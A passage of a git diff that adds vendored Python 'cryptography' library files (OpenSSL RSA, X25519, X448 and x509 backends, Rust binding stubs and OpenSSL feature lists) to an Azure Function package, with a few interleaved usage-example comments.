hashes.HashAlgorithm], + ) -> bytes: + data, algorithm = _calculate_digest_and_algorithm(data, algorithm) + return _rsa_sig_sign(self._backend, padding, algorithm, self, data) + + +class _RSAPublicKey(RSAPublicKey): + _evp_pkey: object + _rsa_cdata: object + _key_size: int + + def __init__(self, backend: "Backend", rsa_cdata, evp_pkey): + self._backend = backend + self._rsa_cdata = rsa_cdata + self._evp_pkey = evp_pkey + + n = 
self._backend._ffi.new("BIGNUM **") + self._backend._lib.RSA_get0_key( + self._rsa_cdata, + n, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + ) + self._backend.openssl_assert(n[0] != self._backend._ffi.NULL) + self._key_size = self._backend._lib.BN_num_bits(n[0]) + + @property + def key_size(self) -> int: + return self._key_size + + def encrypt(self, plaintext: bytes, padding: AsymmetricPadding) -> bytes: + return _enc_dec_rsa(self._backend, self, plaintext, padding) + + def public_numbers(self) -> RSAPublicNumbers: + n = self._backend._ffi.new("BIGNUM **") + e = self._backend._ffi.new("BIGNUM **") + self._backend._lib.RSA_get0_key( + self._rsa_cdata, n, e, self._backend._ffi.NULL + ) + self._backend.openssl_assert(n[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(e[0] != self._backend._ffi.NULL) + return RSAPublicNumbers( + e=self._backend._bn_to_int(e[0]), + n=self._backend._bn_to_int(n[0]), + ) + + def public_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + ) -> bytes: + return self._backend._public_key_bytes( + encoding, format, self, self._evp_pkey, self._rsa_cdata + ) + + def verify( + self, + signature: bytes, + data: bytes, + padding: AsymmetricPadding, + algorithm: typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm], + ) -> None: + data, algorithm = _calculate_digest_and_algorithm(data, algorithm) + _rsa_sig_verify( + self._backend, padding, algorithm, self, signature, data + ) + + def recover_data_from_signature( + self, + signature: bytes, + padding: AsymmetricPadding, + algorithm: typing.Optional[hashes.HashAlgorithm], + ) -> bytes: + if isinstance(algorithm, asym_utils.Prehashed): + raise TypeError( + "Prehashed is only supported in the sign and verify methods. " + "It cannot be used with recover_data_from_signature." + ) + return _rsa_sig_recover( + self._backend, padding, algorithm, self, signature + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/utils.py new file mode 100644 index 0000000..1b674a8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/utils.py @@ -0,0 +1,52 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
+ +import typing + +from cryptography.hazmat.primitives import hashes +from cryptography.hazmat.primitives.asymmetric.utils import Prehashed + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +def _evp_pkey_derive(backend: "Backend", evp_pkey, peer_public_key) -> bytes: + ctx = backend._lib.EVP_PKEY_CTX_new(evp_pkey, backend._ffi.NULL) + backend.openssl_assert(ctx != backend._ffi.NULL) + ctx = backend._ffi.gc(ctx, backend._lib.EVP_PKEY_CTX_free) + res = backend._lib.EVP_PKEY_derive_init(ctx) + backend.openssl_assert(res == 1) + res = backend._lib.EVP_PKEY_derive_set_peer(ctx, peer_public_key._evp_pkey) + backend.openssl_assert(res == 1) + keylen = backend._ffi.new("size_t *") + res = backend._lib.EVP_PKEY_derive(ctx, backend._ffi.NULL, keylen) + backend.openssl_assert(res == 1) + backend.openssl_assert(keylen[0] > 0) + buf = backend._ffi.new("unsigned char[]", keylen[0]) + res = backend._lib.EVP_PKEY_derive(ctx, buf, keylen) + if res != 1: + errors_with_text = backend._consume_errors_with_text() + raise ValueError("Error computing shared key.", errors_with_text) + + return backend._ffi.buffer(buf, keylen[0])[:] + + +def _calculate_digest_and_algorithm( + data: bytes, + algorithm: typing.Union[Prehashed, hashes.HashAlgorithm], +) -> typing.Tuple[bytes, hashes.HashAlgorithm]: + if not isinstance(algorithm, Prehashed): + hash_ctx = hashes.Hash(algorithm) + hash_ctx.update(data) + data = hash_ctx.finalize() + else: + algorithm = algorithm._algorithm + + if len(data) != algorithm.digest_size: + raise ValueError( + "The provided data must be the same length as the hash " + "algorithm's digest size." + ) + + return (data, algorithm) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x25519.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x25519.py new file mode 100644 index 0000000..74db705 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x25519.py @@ -0,0 +1,132 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
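# ---------------------------------------------------------------------------
# [editor's note: illustrative sketch, not part of the vendored files]
# _calculate_digest_and_algorithm above is what lets sign()/verify() accept
# either a hash algorithm (data is digested for you) or Prehashed (you supply
# the digest yourself, e.g. for data hashed on another machine):

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa, utils

signer = rsa.generate_private_key(public_exponent=65537, key_size=2048)

digest = hashes.Hash(hashes.SHA256())
digest.update(b"a large message hashed elsewhere")
prehashed = digest.finalize()

signature = signer.sign(
    prehashed,
    padding.PKCS1v15(),
    utils.Prehashed(hashes.SHA256()),  # must match the digest's algorithm
)
# ---------------------------------------------------------------------------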
+ +import typing + +from cryptography.hazmat.backends.openssl.utils import _evp_pkey_derive +from cryptography.hazmat.primitives import serialization +from cryptography.hazmat.primitives.asymmetric.x25519 import ( + X25519PrivateKey, + X25519PublicKey, +) + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +_X25519_KEY_SIZE = 32 + + +class _X25519PublicKey(X25519PublicKey): + def __init__(self, backend: "Backend", evp_pkey): + self._backend = backend + self._evp_pkey = evp_pkey + + def public_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + ) -> bytes: + if ( + encoding is serialization.Encoding.Raw + or format is serialization.PublicFormat.Raw + ): + if ( + encoding is not serialization.Encoding.Raw + or format is not serialization.PublicFormat.Raw + ): + raise ValueError( + "When using Raw both encoding and format must be Raw" + ) + + return self._raw_public_bytes() + + return self._backend._public_key_bytes( + encoding, format, self, self._evp_pkey, None + ) + + def _raw_public_bytes(self) -> bytes: + ucharpp = self._backend._ffi.new("unsigned char **") + res = self._backend._lib.EVP_PKEY_get1_tls_encodedpoint( + self._evp_pkey, ucharpp + ) + self._backend.openssl_assert(res == 32) + self._backend.openssl_assert(ucharpp[0] != self._backend._ffi.NULL) + data = self._backend._ffi.gc( + ucharpp[0], self._backend._lib.OPENSSL_free + ) + return self._backend._ffi.buffer(data, res)[:] + + +class _X25519PrivateKey(X25519PrivateKey): + def __init__(self, backend: "Backend", evp_pkey): + self._backend = backend + self._evp_pkey = evp_pkey + + def public_key(self) -> X25519PublicKey: + bio = self._backend._create_mem_bio_gc() + res = self._backend._lib.i2d_PUBKEY_bio(bio, self._evp_pkey) + self._backend.openssl_assert(res == 1) + evp_pkey = self._backend._lib.d2i_PUBKEY_bio( + bio, self._backend._ffi.NULL + ) + self._backend.openssl_assert(evp_pkey != self._backend._ffi.NULL) + evp_pkey = self._backend._ffi.gc( + evp_pkey, self._backend._lib.EVP_PKEY_free + ) + return _X25519PublicKey(self._backend, evp_pkey) + + def exchange(self, peer_public_key: X25519PublicKey) -> bytes: + if not isinstance(peer_public_key, X25519PublicKey): + raise TypeError("peer_public_key must be X25519PublicKey.") + + return _evp_pkey_derive(self._backend, self._evp_pkey, peer_public_key) + + def private_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: serialization.KeySerializationEncryption, + ) -> bytes: + if ( + encoding is serialization.Encoding.Raw + or format is serialization.PublicFormat.Raw + ): + if ( + format is not serialization.PrivateFormat.Raw + or encoding is not serialization.Encoding.Raw + or not isinstance( + encryption_algorithm, serialization.NoEncryption + ) + ): + raise ValueError( + "When using Raw both encoding and format must be Raw " + "and encryption_algorithm must be NoEncryption()" + ) + + return self._raw_private_bytes() + + return self._backend._private_key_bytes( + encoding, format, encryption_algorithm, self, self._evp_pkey, None + ) + + def _raw_private_bytes(self) -> bytes: + # When we drop support for CRYPTOGRAPHY_OPENSSL_LESS_THAN_111 we can + # switch this to EVP_PKEY_new_raw_private_key + # The trick we use here is serializing to a PKCS8 key and just + # using the last 32 bytes, which is the key itself. 
+ bio = self._backend._create_mem_bio_gc() + res = self._backend._lib.i2d_PKCS8PrivateKey_bio( + bio, + self._evp_pkey, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + 0, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + ) + self._backend.openssl_assert(res == 1) + pkcs8 = self._backend._read_mem_bio(bio) + self._backend.openssl_assert(len(pkcs8) == 48) + return pkcs8[-_X25519_KEY_SIZE:] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x448.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x448.py new file mode 100644 index 0000000..9c3aea1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x448.py @@ -0,0 +1,117 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.hazmat.backends.openssl.utils import _evp_pkey_derive +from cryptography.hazmat.primitives import serialization +from cryptography.hazmat.primitives.asymmetric.x448 import ( + X448PrivateKey, + X448PublicKey, +) + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + +_X448_KEY_SIZE = 56 + + +class _X448PublicKey(X448PublicKey): + def __init__(self, backend: "Backend", evp_pkey): + self._backend = backend + self._evp_pkey = evp_pkey + + def public_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + ) -> bytes: + if ( + encoding is serialization.Encoding.Raw + or format is serialization.PublicFormat.Raw + ): + if ( + encoding is not serialization.Encoding.Raw + or format is not serialization.PublicFormat.Raw + ): + raise ValueError( + "When using Raw both encoding and format must be Raw" + ) + + return self._raw_public_bytes() + + return self._backend._public_key_bytes( + encoding, format, self, self._evp_pkey, None + ) + + def _raw_public_bytes(self) -> bytes: + buf = self._backend._ffi.new("unsigned char []", _X448_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _X448_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_public_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _X448_KEY_SIZE) + return self._backend._ffi.buffer(buf, _X448_KEY_SIZE)[:] + + +class _X448PrivateKey(X448PrivateKey): + def __init__(self, backend: "Backend", evp_pkey): + self._backend = backend + self._evp_pkey = evp_pkey + + def public_key(self) -> X448PublicKey: + buf = self._backend._ffi.new("unsigned char []", _X448_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _X448_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_public_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _X448_KEY_SIZE) + public_bytes = self._backend._ffi.buffer(buf)[:] + return self._backend.x448_load_public_bytes(public_bytes) + + def exchange(self, peer_public_key: X448PublicKey) -> bytes: + if not isinstance(peer_public_key, X448PublicKey): + raise TypeError("peer_public_key must be X448PublicKey.") + + return _evp_pkey_derive(self._backend, self._evp_pkey, peer_public_key) + + def private_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: 
serialization.KeySerializationEncryption, + ) -> bytes: + if ( + encoding is serialization.Encoding.Raw + or format is serialization.PublicFormat.Raw + ): + if ( + format is not serialization.PrivateFormat.Raw + or encoding is not serialization.Encoding.Raw + or not isinstance( + encryption_algorithm, serialization.NoEncryption + ) + ): + raise ValueError( + "When using Raw both encoding and format must be Raw " + "and encryption_algorithm must be NoEncryption()" + ) + + return self._raw_private_bytes() + + return self._backend._private_key_bytes( + encoding, format, encryption_algorithm, self, self._evp_pkey, None + ) + + def _raw_private_bytes(self) -> bytes: + buf = self._backend._ffi.new("unsigned char []", _X448_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _X448_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_private_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _X448_KEY_SIZE) + return self._backend._ffi.buffer(buf, _X448_KEY_SIZE)[:] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x509.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x509.py new file mode 100644 index 0000000..92b6d0e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/x509.py @@ -0,0 +1,45 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import warnings + +from cryptography import utils, x509 + + +# This exists for pyOpenSSL compatibility and SHOULD NOT BE USED +# WE WILL REMOVE THIS VERY SOON. +def _Certificate(backend, x509) -> x509.Certificate: # noqa: N802 + warnings.warn( + "This version of cryptography contains a temporary pyOpenSSL " + "fallback path. Upgrade pyOpenSSL now.", + utils.DeprecatedIn35, + ) + return backend._ossl2cert(x509) + + +# This exists for pyOpenSSL compatibility and SHOULD NOT BE USED +# WE WILL REMOVE THIS VERY SOON. +def _CertificateSigningRequest( # noqa: N802 + backend, x509_req +) -> x509.CertificateSigningRequest: + warnings.warn( + "This version of cryptography contains a temporary pyOpenSSL " + "fallback path. Upgrade pyOpenSSL now.", + utils.DeprecatedIn35, + ) + return backend._ossl2csr(x509_req) + + +# This exists for pyOpenSSL compatibility and SHOULD NOT BE USED +# WE WILL REMOVE THIS VERY SOON. +def _CertificateRevocationList( # noqa: N802 + backend, x509_crl +) -> x509.CertificateRevocationList: + warnings.warn( + "This version of cryptography contains a temporary pyOpenSSL " + "fallback path. Upgrade pyOpenSSL now.", + utils.DeprecatedIn35, + ) + return backend._ossl2crl(x509_crl) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/__init__.py new file mode 100644 index 0000000..171557e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/__init__.py @@ -0,0 +1,3 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. 
See the LICENSE file in the root of this repository +# for complete details. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..0db6883 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_openssl.abi3.so b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_openssl.abi3.so new file mode 100644 index 0000000..a658b50 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_openssl.abi3.so differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust.abi3.so b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust.abi3.so new file mode 100644 index 0000000..6c23c80 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust.abi3.so differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/__init__.pyi b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/__init__.pyi new file mode 100644 index 0000000..1a1fae7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/__init__.pyi @@ -0,0 +1,2 @@ +def check_pkcs7_padding(data: bytes) -> bool: ... +def check_ansix923_padding(data: bytes) -> bool: ... diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/asn1.pyi b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/asn1.pyi new file mode 100644 index 0000000..4d40fcc --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/asn1.pyi @@ -0,0 +1,12 @@ +import typing + +class TestCertificate: + not_after_tag: int + not_before_tag: int + issuer_value_tags: typing.List[int] + subject_value_tags: typing.List[int] + +def decode_dss_signature(signature: bytes) -> typing.Tuple[int, int]: ... +def encode_dss_signature(r: int, s: int) -> bytes: ... +def parse_spki_for_data(data: bytes) -> bytes: ... +def test_parse_certificate(data: bytes) -> TestCertificate: ... 
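# ---------------------------------------------------------------------------
# [editor's note: illustrative sketch, not part of the vendored files]
# The X25519/X448 backends earlier in this patch both delegate key agreement
# to _evp_pkey_derive. A minimal X25519 exchange; the raw shared secret
# should be run through a KDF before use as a key (the HKDF info value here
# is purely illustrative):

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

alice = X25519PrivateKey.generate()
bob = X25519PrivateKey.generate()
shared = alice.exchange(bob.public_key())          # 32 bytes (_X25519_KEY_SIZE)
assert shared == bob.exchange(alice.public_key())  # both sides agree

derived_key = HKDF(
    algorithm=hashes.SHA256(), length=32, salt=None, info=b"handshake data"
).derive(shared)
# ---------------------------------------------------------------------------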
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/ocsp.pyi b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/ocsp.pyi new file mode 100644 index 0000000..b111092 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/ocsp.pyi @@ -0,0 +1,22 @@ +import typing + +from cryptography.hazmat.primitives.asymmetric.types import PRIVATE_KEY_TYPES +from cryptography.hazmat.primitives import hashes +from cryptography.x509 import Extension +from cryptography.x509.ocsp import ( + OCSPRequest, + OCSPRequestBuilder, + OCSPResponse, + OCSPResponseStatus, + OCSPResponseBuilder, +) + +def load_der_ocsp_request(data: bytes) -> OCSPRequest: ... +def load_der_ocsp_response(data: bytes) -> OCSPResponse: ... +def create_ocsp_request(builder: OCSPRequestBuilder) -> OCSPRequest: ... +def create_ocsp_response( + status: OCSPResponseStatus, + builder: typing.Optional[OCSPResponseBuilder], + private_key: typing.Optional[PRIVATE_KEY_TYPES], + hash_algorithm: typing.Optional[hashes.HashAlgorithm], +) -> OCSPResponse: ... diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/x509.pyi b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/x509.pyi new file mode 100644 index 0000000..2ea11c8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/_rust/x509.pyi @@ -0,0 +1,36 @@ +import datetime +import typing + +from cryptography import x509 +from cryptography.hazmat.primitives import hashes +from cryptography.hazmat.primitives.asymmetric.types import PRIVATE_KEY_TYPES + +def load_pem_x509_certificate(data: bytes) -> x509.Certificate: ... +def load_der_x509_certificate(data: bytes) -> x509.Certificate: ... +def load_pem_x509_crl(data: bytes) -> x509.CertificateRevocationList: ... +def load_der_x509_crl(data: bytes) -> x509.CertificateRevocationList: ... +def load_pem_x509_csr(data: bytes) -> x509.CertificateSigningRequest: ... +def load_der_x509_csr(data: bytes) -> x509.CertificateSigningRequest: ... +def encode_name_bytes(name: x509.Name) -> bytes: ... +def encode_extension_value(extension: x509.ExtensionType) -> bytes: ... +def create_x509_certificate( + builder: x509.CertificateBuilder, + private_key: PRIVATE_KEY_TYPES, + hash_algorithm: typing.Optional[hashes.HashAlgorithm], +) -> x509.Certificate: ... +def create_x509_csr( + builder: x509.CertificateSigningRequestBuilder, + private_key: PRIVATE_KEY_TYPES, + hash_algorithm: typing.Optional[hashes.HashAlgorithm], +) -> x509.CertificateSigningRequest: ... +def create_x509_crl( + builder: x509.CertificateRevocationListBuilder, + private_key: PRIVATE_KEY_TYPES, + hash_algorithm: typing.Optional[hashes.HashAlgorithm], +) -> x509.CertificateRevocationList: ... + +class Sct: ... +class Certificate: ... +class RevokedCertificate: ... +class CertificateRevocationList: ... +class CertificateSigningRequest: ... 
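# ---------------------------------------------------------------------------
# [editor's note: illustrative sketch, not part of the vendored files]
# The _rust/x509.pyi stubs above declare the Rust-backed loaders reachable
# through the public x509 module ("cert.pem" is a hypothetical path):

from cryptography import x509

with open("cert.pem", "rb") as f:
    certificate = x509.load_pem_x509_certificate(f.read())

print(certificate.subject.rfc4514_string())
print(certificate.not_valid_before, certificate.not_valid_after)
# ---------------------------------------------------------------------------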
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__init__.py new file mode 100644 index 0000000..171557e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__init__.py @@ -0,0 +1,3 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..88658ed Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/_conditional.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/_conditional.cpython-39.pyc new file mode 100644 index 0000000..f60d812 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/_conditional.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/binding.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/binding.cpython-39.pyc new file mode 100644 index 0000000..fcfdc0c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/__pycache__/binding.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/_conditional.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/_conditional.py new file mode 100644 index 0000000..4f0bcd8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/_conditional.py @@ -0,0 +1,367 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
+ +import typing + + +def cryptography_has_ec2m() -> typing.List[str]: + return [ + "EC_POINT_get_affine_coordinates_GF2m", + ] + + +def cryptography_has_ssl3_method() -> typing.List[str]: + return [ + "SSLv3_method", + "SSLv3_client_method", + "SSLv3_server_method", + ] + + +def cryptography_has_110_verification_params() -> typing.List[str]: + return ["X509_CHECK_FLAG_NEVER_CHECK_SUBJECT"] + + +def cryptography_has_set_cert_cb() -> typing.List[str]: + return [ + "SSL_CTX_set_cert_cb", + "SSL_set_cert_cb", + ] + + +def cryptography_has_ssl_st() -> typing.List[str]: + return [ + "SSL_ST_BEFORE", + "SSL_ST_OK", + "SSL_ST_INIT", + "SSL_ST_RENEGOTIATE", + ] + + +def cryptography_has_tls_st() -> typing.List[str]: + return [ + "TLS_ST_BEFORE", + "TLS_ST_OK", + ] + + +def cryptography_has_scrypt() -> typing.List[str]: + return [ + "EVP_PBE_scrypt", + ] + + +def cryptography_has_evp_pkey_dhx() -> typing.List[str]: + return [ + "EVP_PKEY_DHX", + ] + + +def cryptography_has_mem_functions() -> typing.List[str]: + return [ + "Cryptography_CRYPTO_set_mem_functions", + ] + + +def cryptography_has_x509_store_ctx_get_issuer() -> typing.List[str]: + return [ + "X509_STORE_get_get_issuer", + "X509_STORE_set_get_issuer", + ] + + +def cryptography_has_ed448() -> typing.List[str]: + return [ + "EVP_PKEY_ED448", + "NID_ED448", + ] + + +def cryptography_has_ed25519() -> typing.List[str]: + return [ + "NID_ED25519", + "EVP_PKEY_ED25519", + ] + + +def cryptography_has_poly1305() -> typing.List[str]: + return [ + "NID_poly1305", + "EVP_PKEY_POLY1305", + ] + + +def cryptography_has_oneshot_evp_digest_sign_verify() -> typing.List[str]: + return [ + "EVP_DigestSign", + "EVP_DigestVerify", + ] + + +def cryptography_has_evp_digestfinal_xof() -> typing.List[str]: + return [ + "EVP_DigestFinalXOF", + ] + + +def cryptography_has_evp_pkey_get_set_tls_encodedpoint() -> typing.List[str]: + return [ + "EVP_PKEY_get1_tls_encodedpoint", + "EVP_PKEY_set1_tls_encodedpoint", + ] + + +def cryptography_has_fips() -> typing.List[str]: + return [ + "FIPS_mode_set", + "FIPS_mode", + ] + + +def cryptography_has_psk() -> typing.List[str]: + return [ + "SSL_CTX_use_psk_identity_hint", + "SSL_CTX_set_psk_server_callback", + "SSL_CTX_set_psk_client_callback", + ] + + +def cryptography_has_psk_tlsv13() -> typing.List[str]: + return [ + "SSL_CTX_set_psk_find_session_callback", + "SSL_CTX_set_psk_use_session_callback", + "Cryptography_SSL_SESSION_new", + "SSL_CIPHER_find", + "SSL_SESSION_set1_master_key", + "SSL_SESSION_set_cipher", + "SSL_SESSION_set_protocol_version", + ] + + +def cryptography_has_custom_ext() -> typing.List[str]: + return [ + "SSL_CTX_add_client_custom_ext", + "SSL_CTX_add_server_custom_ext", + "SSL_extension_supported", + ] + + +def cryptography_has_openssl_cleanup() -> typing.List[str]: + return [ + "OPENSSL_cleanup", + ] + + +def cryptography_has_tlsv13() -> typing.List[str]: + return [ + "TLS1_3_VERSION", + "SSL_OP_NO_TLSv1_3", + ] + + +def cryptography_has_tlsv13_functions() -> typing.List[str]: + return [ + "SSL_VERIFY_POST_HANDSHAKE", + "SSL_CTX_set_ciphersuites", + "SSL_verify_client_post_handshake", + "SSL_CTX_set_post_handshake_auth", + "SSL_set_post_handshake_auth", + "SSL_SESSION_get_max_early_data", + "SSL_write_early_data", + "SSL_read_early_data", + "SSL_CTX_set_max_early_data", + ] + + +def cryptography_has_keylog() -> typing.List[str]: + return [ + "SSL_CTX_set_keylog_callback", + "SSL_CTX_get_keylog_callback", + ] + + +def cryptography_has_raw_key() -> typing.List[str]: + return [ + 
"EVP_PKEY_new_raw_private_key", + "EVP_PKEY_new_raw_public_key", + "EVP_PKEY_get_raw_private_key", + "EVP_PKEY_get_raw_public_key", + ] + + +def cryptography_has_engine() -> typing.List[str]: + return [ + "ENGINE_by_id", + "ENGINE_init", + "ENGINE_finish", + "ENGINE_get_default_RAND", + "ENGINE_set_default_RAND", + "ENGINE_unregister_RAND", + "ENGINE_ctrl_cmd", + "ENGINE_free", + "ENGINE_get_name", + "Cryptography_add_osrandom_engine", + "ENGINE_ctrl_cmd_string", + "ENGINE_load_builtin_engines", + "ENGINE_load_private_key", + "ENGINE_load_public_key", + "SSL_CTX_set_client_cert_engine", + ] + + +def cryptography_has_verified_chain() -> typing.List[str]: + return [ + "SSL_get0_verified_chain", + ] + + +def cryptography_has_srtp() -> typing.List[str]: + return [ + "SSL_CTX_set_tlsext_use_srtp", + "SSL_set_tlsext_use_srtp", + "SSL_get_selected_srtp_profile", + ] + + +def cryptography_has_get_proto_version() -> typing.List[str]: + return [ + "SSL_CTX_get_min_proto_version", + "SSL_CTX_get_max_proto_version", + "SSL_get_min_proto_version", + "SSL_get_max_proto_version", + ] + + +def cryptography_has_providers() -> typing.List[str]: + return [ + "OSSL_PROVIDER_load", + "OSSL_PROVIDER_unload", + "ERR_LIB_PROV", + "PROV_R_WRONG_FINAL_BLOCK_LENGTH", + "PROV_R_BAD_DECRYPT", + ] + + +def cryptography_has_op_no_renegotiation() -> typing.List[str]: + return [ + "SSL_OP_NO_RENEGOTIATION", + ] + + +def cryptography_has_dtls_get_data_mtu() -> typing.List[str]: + return [ + 